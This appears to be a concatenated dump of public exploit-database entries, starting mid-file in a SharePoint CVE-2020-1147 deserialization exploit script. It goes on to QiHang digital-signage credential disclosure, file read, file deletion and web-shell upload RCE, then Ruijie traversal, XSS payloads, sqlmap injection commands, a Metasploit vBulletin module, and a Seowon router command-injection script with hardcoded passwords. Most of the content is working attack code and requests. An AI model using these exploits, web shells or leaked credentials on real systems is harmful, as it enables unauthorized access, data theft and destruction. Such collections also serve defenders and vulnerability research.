msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">{GADGET}</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>""".replace('{GADGET}', self.gadget) def do_get(self, url, params=None, data=None): return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=data, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def do_post(self, url, data=None, params=None): return self.session.post( url=url, data=data, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) def parse_page(self, content): soup = BeautifulSoup(content, 'lxml') for key, val in self.form_values.iteritems(): try: for tag in soup.select('input[name=%s]' % key): try: self.form_values[key] = tag['value'] except Exception as error: stderr.write('error for key %s error %s\n' % (key, str(error))) except Exception as error: stderr.write('error for selector %s error %s\n' % (key, str(error))) return self def debug(self): try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def clean(self, payload): payload = payload\ .replace('\n', '')\ .replace('\r', '') while ' ' in payload: payload = payload\ .replace(' ', ' ') return payload def get_form(self): url = '%s%s' % (self.target, self.control_path) resp = self.do_get(url=url, params=self.query_params) self.parse_page(content=resp.content) return resp def send_payload(self): url = '%s%s' % (self.target, self.control_path) # self.get_form() self.headers['Content-Type'] = 'application/x-www-form-urlencoded' self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) self.form_values['__viewstate'] = '' resp = self.do_post(url=url, params=self.query_params, data=self.form_values) return resp if __name__ == '__main__': parser = argparse.ArgumentParser(add_help=True, description='CVE-2020-1147 SharePoint exploit') try: parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ') parser.add_argument('-username', action='store', default='', help='Username to use: first.last') parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local') parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020') parser.add_argument('-both', action='store', default=False, help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): False') parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False') parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() exp = Exploit( proxy_address=options.proxy, username=options.username, domain=options.domain, password=options.password, target=options.target ) if options.debug: exp.debug() stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' % ( options.target, options.username, options.domain, options.password, options.debug, options.proxy )) result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) if 'MicrosoftSharePointTeamServices' in result.headers: stdout.write('Version: %s\n' % result.headers['MicrosoftSharePointTeamServices']) if options.both and result.status_code != 200: exp.control_path = exp.control_path_quicklinksdialogform stdout.write('Trying alternate page\n') result = exp.send_payload() stdout.write('Response: %d\n' % result.status_code) except Exception as error: stderr.write('error in main %s' % str(error))

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file '/xml/User/User.xml' and obtain administrative login information that allows for a successful authentication bypass attack. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5579 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php 27.07.2020 -- $ curl http://192.168.1.1/xml/User/User.xml <?xml version="1.0" encoding="utf-8"?> <Users> <User id="1" account="admin" password="admin" /> <User id="2" account="dev" password="dev" /> </Users>

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: The application suffers from an unauthenticated file disclosure vulnerability when input passed thru the 'filename' parameter when using the download action or thru 'path' parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5581 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php 27.07.2020 -- Source code disclosure PoC: --------------------------- GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1 Host: 192.168.1.74:8090 User-Agent: lfi_test.wrapper/2.9 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close -- HTTP/1.1 200 OK Server: HowFor Web Server/5.6.0.0 Date: Sun, 26 Jul 2020 22:49:08 GMT X-AspNet-Version: 4.0.30319 Content-Disposition: attachment;filename=QH.aspx Set-Cookie: ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: application/zip Content-Length: 463 Connection: Close <%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <title></title> </head> <body> <form id="form1" runat="server"> <div> </div> </form> </body> </html> Arbitrary file read: -------------------- http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config Directory contents disclosure: ------------------------------ POST /QH.aspx HTTP/1.1 Host: 192.168.1.74:8090 Content-Length: 62 User-Agent: lfi_test.wrapper/2.9 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close responderId=ResourceNewResponder&action=getAll&path=&fileName= -- HTTP/1.1 200 OK Server: HowFor Web Server/5.6.0.0 Date: Tue, 28 Jul 2020 23:51:13 GMT X-AspNet-Version: 4.0.30319 Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 4680 Connection: Close { "first": true, "second": [ { "name": "App_Data", "type": "folder", "size": 852992.0, "uploadTime": new Date( 1525316885250 ), "path": "/App_Data" }, { "name": "bin", "type": "folder", "size": 4398172.0, "uploadTime": new Date( 1525316885046 ), ... ... "name": "xml", "type": "folder", "size": 25519.0, "uploadTime": new Date( 1525316885234 ), "path": "/xml" }, { "name": "default.htm", "type": ".htm", "size": 1609.0, "uploadTime": new Date( 1523859040000 ), "path": "/default.htm" }, { "name": "Global.asax", "type": ".asax", "size": 100.0, "uploadTime": new Date( 1523859032000 ), "path": "/Global.asax" }, { "name": "IIS.dll", "type": ".dll", "size": 40960.0, "uploadTime": new Date( 1523859036000 ), ... ... "path": "/Media.Server.DeamonPlugin.Web.xml" }, { "name": "preview.htm", "type": ".htm", "size": 947.0, "uploadTime": new Date( 1523859040000 ), "path": "/preview.htm" }, { "name": "QH.aspx", "type": ".aspx", "size": 463.0, "uploadTime": new Date( 1523859030000 ), "path": "/QH.aspx" }, { "name": "server.xml", "type": ".xml", "size": 206.0, "uploadTime": new Date( 1523859034000 ), "path": "/server.xml" }, { "name": "Web.config", "type": ".config", "size": 2470.0, "uploadTime": new Date( 1523859034000 ), "path": "/Web.config" } ], "third": 0 }

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: Input passed to the 'data' parameter in 'QH.aspx' for delete action is not properly sanitised before being used to delete files. This can be exploited by an unauthenticated attacker to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST parameter. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5580 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php 27.07.2020 -- POST /QH.aspx HTTP/1.1 Host: 192.168.1.74:8090 Content-Length: 105 User-Agent: Eraser X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: http://192.168.1.74:8090 Referer: http://192.168.1.74:8090/index.htm Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"]

# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated) # Date: 2020-08-12 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.howfor.com # Tested on: Microsoft Windows Server 2012 R2 Datacenter # CVE : N/A <!-- QiHang Media Web (QH.aspx) Digital Signage 3.0.9 (pre-auth) Remote Code Execution Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. Guangzhou Hefeng Automation Technology Co., Ltd. Product web page: http://www.howfor.com Affected version: 3.0.9.0 Summary: Digital Signage Software. Desc: The application suffers from an unauthenticated remote code execution. The vulnerability is caused due to lack of verification when uploading files with QH.aspx that can be written in any location by utilizing the 'remotePath' parameter to traverse through directories. Abusing the upload action and the 'fileToUpload' parameter, an unauthenticated attacker can exploit this to execute system commands by uploading a malicious ASPX script. Tested on: Microsoft Windows Server 2012 R2 Datacenter Microsoft Windows Server 2003 Enterprise Edition ASP.NET 4.0.30319 HowFor Web Server/5.6.0.0 Microsoft ASP.NET Web QiHang IIS Server Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5582 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php 27.07.2020 --> <html> <body> <script> function uploadShellPoC() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.1.74:8090\/QH.aspx", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryhbcZX7o0Hw19h3kr"); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"fileToUpload\"; filename=\"cmd.aspx\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c%@ Page Language=\"VB\" Debug=\"true\" %\x3e\r\n" + "\x3c%@ import Namespace=\"system.IO\" %\x3e\r\n" + "\x3c%@ import Namespace=\"System.Diagnostics\" %\x3e\r\n" + "\r\n" + "\x3cscript runat=\"server\"\x3e\r\n" + "\r\n" + "Sub RunCmd(Src As Object, E As EventArgs)\r\n" + " Dim myProcess As New Process()\r\n" + " Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)\r\n" + " myProcessStartInfo.UseShellExecute = false\r\n" + " myProcessStartInfo.RedirectStandardOutput = true\r\n" + " myProcess.StartInfo = myProcessStartInfo\r\n" + " myProcessStartInfo.Arguments=xcmd.text\r\n" + " myProcess.Start()\r\n" + "\r\n" + " Dim myStreamReader As StreamReader = myProcess.StandardOutput\r\n" + " Dim myString As String = myStreamReader.Readtoend()\r\n" + " myProcess.Close()\r\n" + " mystring=replace(mystring,\"\x3c\",\"<\")\r\n" + " mystring=replace(mystring,\"\x3e\",\">\")\r\n" + " result.text= vbcrlf & \"\x3cpre\x3e\" & mystring & \"\x3c/pre\x3e\"\r\n" + "End Sub\r\n" + "\r\n" + "\x3c/script\x3e\r\n" + "\r\n" + "\x3chtml\x3e\r\n" + "\x3cbody\x3e\r\n" + "\x3cform runat=\"server\"\x3e\r\n" + "\x3cp\x3e\x3casp:Label id=\"L_p\" runat=\"server\" width=\"80px\"\x3eProgram\x3c/asp:Label\x3e\r\n" + "\x3casp:TextBox id=\"xpath\" runat=\"server\" Width=\"300px\"\x3ec:\\windows\\system32\\cmd.exe\x3c/asp:TextBox\x3e\r\n" + "\x3cp\x3e\x3casp:Label id=\"L_a\" runat=\"server\" width=\"80px\"\x3eArguments\x3c/asp:Label\x3e\r\n" + "\x3casp:TextBox id=\"xcmd\" runat=\"server\" Width=\"300px\" Text=\"/c net user\"\x3e/c net user\x3c/asp:TextBox\x3e\r\n" + "\x3cp\x3e\x3casp:Button id=\"Button\" onclick=\"runcmd\" runat=\"server\" Width=\"100px\" Text=\"Run\"\x3e\x3c/asp:Button\x3e\r\n" + "\x3cp\x3e\x3casp:Label id=\"result\" runat=\"server\"\x3e\x3c/asp:Label\x3e\r\n" + "\x3c/form\x3e\r\n" + "\x3c/body\x3e\r\n" + "\x3c/html\x3e\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "upload\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"responderId\"\r\n" + "\r\n" + "ResourceNewResponder\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr\r\n" + "Content-Disposition: form-data; name=\"remotePath\"\r\n" + "\r\n" + "/opt/resources\r\n" + "------WebKitFormBoundaryhbcZX7o0Hw19h3kr--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Click" onclick="uploadShellPoC();" /> </form> </body> </html> <!-- JSON response for successful upload: { "first": true, "second": [ "cmd.aspx" ] } GET request: http://192.168.1.74:8090/opt/resources/cmd.aspx Command issued: /c whoami Response: robertovolare\administrator -->

# Exploit Title: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal # Exploit Author: Tuygun # Date: 2020-08-19 # Vendor Homepage: https://www.ruijienetworks.com/ # Version: eWeb S29_RGOS 11.4(1)B12P11 # Source : https://faruktuygun.com/directorytraversal.html Proof of Concept Request: GET /download.do?file=../../../../config.text HTTP/1.1 Host: 192.168.2.160 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: LOCAL_LANG_COOKIE=en; UI_LOCAL_COOKIE=en; mac=0074.9c95.43f0; SID=33BA8206DE5B8B8295C89A3C4787D7A; module=network; subModule=certify; threeModule=certify_adv Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Wed, 03 Jun 2020 20:52.25 GMT Server: HTTP-Server/1.1 Content-length: 2070 Content-Disposition: attachment; filename="config.text" Content-Type: application/octet-stream; Charset=UTF-8 version S29_RGOS 11.4(1)B12P11 hostname OMURGA ! no spanning-tree ! username admin password admin username ruijie privilege 15 201998 ! cwmp ! install 0 S2910C-24GT2XS-HP-E ! sysmac 0074.9C95.43f0 ! enable service web-server http enable service web-server https webmaster level 1 username ruijie password 201998 ! nfpp ! . . .

# Exploit Title: Savsoft Quiz 5 - Stored Cross-Site Scripting # Date: 2020-07-28 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: https://savsoftquiz.com/ # Software Link: https://github.com/savsofts/savsoftquiz_v5.git # Version: 5.0 # Tested on: Windows 10 # Contact: https://www.linkedin.com/in/th3cyb3rc0p/ # CVE: CVE-2020-24609 Stored Cross-site scripting(XSS): Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS. Attack vector: This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: First Name, Last Name Steps for reproduce: 1. Goto registration page 2. fill the details. & put <script>alert("XSS")</script> payload in First name,Last name 3. Now goto Admin Panel.we can see that our payload gets executed. POST /index.php/login/insert_user/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 255 Origin: http://localhost Connection: close Referer: http://localhost/index.php/login/registration/ Cookie: ci_session=d99b121b1213b92a163181fd49c75f667dbce9ea Upgrade-Insecure-Requests: 1 email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1

# Title: Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-18 # Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html # Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "catId" is vulnerable to Time-Based blind SQL injection in this path "/medical/inventeries.php?catID=1" that leads to retrieve all databases. #POC sqlmap -u "http://TARGET/medical/inventeries.php?catID=1" -p catId --dbms=mysql --threads=10

# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting # Date: 2020-08-14 # Exploit Author: Enes Özeser # Vendor Homepage: https://www.elkarbackup.org/ # Version: 1.3.3 # Tested on: Linux 1- Go to following url. >> http://(HOST)/elkarbackup/login 2- Default username and password is root:root. We must know login credentials. 3- Go to "Jobs" and press "Add client" button. 4- Write XSS payload in "Name" section. 5- Press "Save" button. (( Executable XSS Payloads )) 1- "><script>alert('XSS Confirmed!');</script> 2- "><script>alert("XSS Confirmed!");</script> 3- "><script>alert(document.cookie);</script> 4- "><script>alert(document.domain);</script> (( REQUEST )) POST /elkarbackup/client/2 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://(HOST)/elkarbackup/client/2 Content-Type: application/x-www-form-urlencoded Content-Length: 358 Connection: close Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2 Upgrade-Insecure-Requests: 1 Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E& Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1& Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=& Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI

# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated) # Google Dork: - # Date: 2020-08-17 # Exploit Author: İsmail ERKEK # Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp # Version: 2.200816204020 # Tested on: - 1. Description: ---------------------- PNPSCADA 2.200816204020 allows SQL Injection via parameter 'interf' in /browse.jsp. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'interf' parameter and save it like fuel.req Then run SQLmap to extract the data from the database: sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent 3. Example payload: ---------------------- (time-based blind) memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND 6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831 4. Burpsuite request: ---------------------- POST /browse.jsp HTTP/1.1 Host: 127.0.0.1 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes Content-Type: application/x-www-form-urlencoded Content-Length: 93 Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37 memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831 Best Regards. Ek alanı

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution', 'Description' => %q{ This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9 }, 'Platform' => 'php', 'License' => MSF_LICENSE, 'Author' => [ 'Netanel Rubin', # reported by 'cutz', # original exploit 'Julien (jvoisin) Voisin', # metasploit module ], 'Payload' => { 'BadChars' => "\x22", }, 'References' => [ ['CVE', '2015-7808'], ['EDB', '38629'], ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'], ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/'] ], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Targeting', { 'auto' => true } ], ['vBulletin 5.0.X', {'chain' => 'vB_Database'}], ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}], ], 'DisclosureDate' => 'Nov 4 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) ]) end def check begin res = send_request_cgi({ 'uri' => target_uri.path }) if (res && res.body.include?('vBulletin Solutions, Inc.')) if res.body.include?("Version 5.0") @my_target = targets[1] if target['auto'] return Exploit::CheckCode::Appears elsif res.body.include?("Version 5.1") @my_target = targets[2] if target['auto'] return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe end end def exploit print_status("Trying to inferprint the instance...") @my_target = target check_code = check unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable instance") end if @my_target.nil? || @my_target['auto'] fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s chain << ':"' chain << @my_target["chain"] chain << '":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:' chain << "#{payload.encoded.length}:\"#{payload.encoded}\";}" chain = Rex::Text.uri_encode(chain) chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'), 'vars_get' => { 'arguments' => chain }, 'encode_params' => false, }) end end

# Exploit Title: Seowon SlC 130 Router - Remote Code Execution # Author: maj0rmil4d - Ali Jalalat # Author website: https://secureguy.ir # Date: 2020-08-20 # Vendor Homepage: seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29 # CVE: CVE-2020-17456 # Version: Lync:Mac firmware 1.0.1, likely earlier versions # Tested on: Windows 10 - Parrot sec # Description: # user can run arbitrary commands on the router as root ! # as there are already some hardcoded credentials so there is an easy to trigger exploit # credentials : # user => VIP # pwd => V!P83869000 # user => Root # pwd => PWDd0N~WH*4G#DN # user => root # pwd => gksrmf28 # user => admin # pwd => admin # # A write-up can be found at: # https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/ import requests import sys host = sys.argv[1] session = requests.Session() header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8", "Accept-Language": "en-US,en;q:0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "pplication/x-www-form-urlencoded", "Content-Length": "132", "Origin": "http://192.168.1.1", "Connection": "close", "Referer": "http://192.168.1.1/", "Upgrade-Insecure-Requests": "1" } datas = { "Command":"Submit", "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT", "browserTime":"081119502020", "currentTime":"1597159205", "user":"admin", "password":"admin" } #auth session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas) #rce cmd = sys.argv[2] rce_data = { "Command":"Diagnostic", "traceMode":"ping", "reportIpOnly":"", "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd, "pingPktSize":"56", "pingTimeout":"30", "pingCount":"4", "maxTTLCnt":"30", "queriesCnt":"3", "reportIpOnlyCheckbox":"on", "btnApply":"Apply", "T":"1597160664082" } rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data) print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])

# Title: Complaint Management System 1.0 - 'cid' SQL Injection # Exploit Author: Mohamed Elobeid (0b3!d) # Date: 2020-08-21 # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14206&title=Complaint+Management+System # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "cid" is vulnerable to Error-Based blind SQL injection in this path "/Complaint%20Management%20System/admin/complaint-details.php?cid=60" that leads to retrieve all databases. #POC sqlmap -u 'http://target/Complaint Management System/admin/complaint-details.php?cid=60' --cookie="PHPSESSID=bb4g25d3qceicepo7b3d26cfpp" --dbms=mysql --dbs

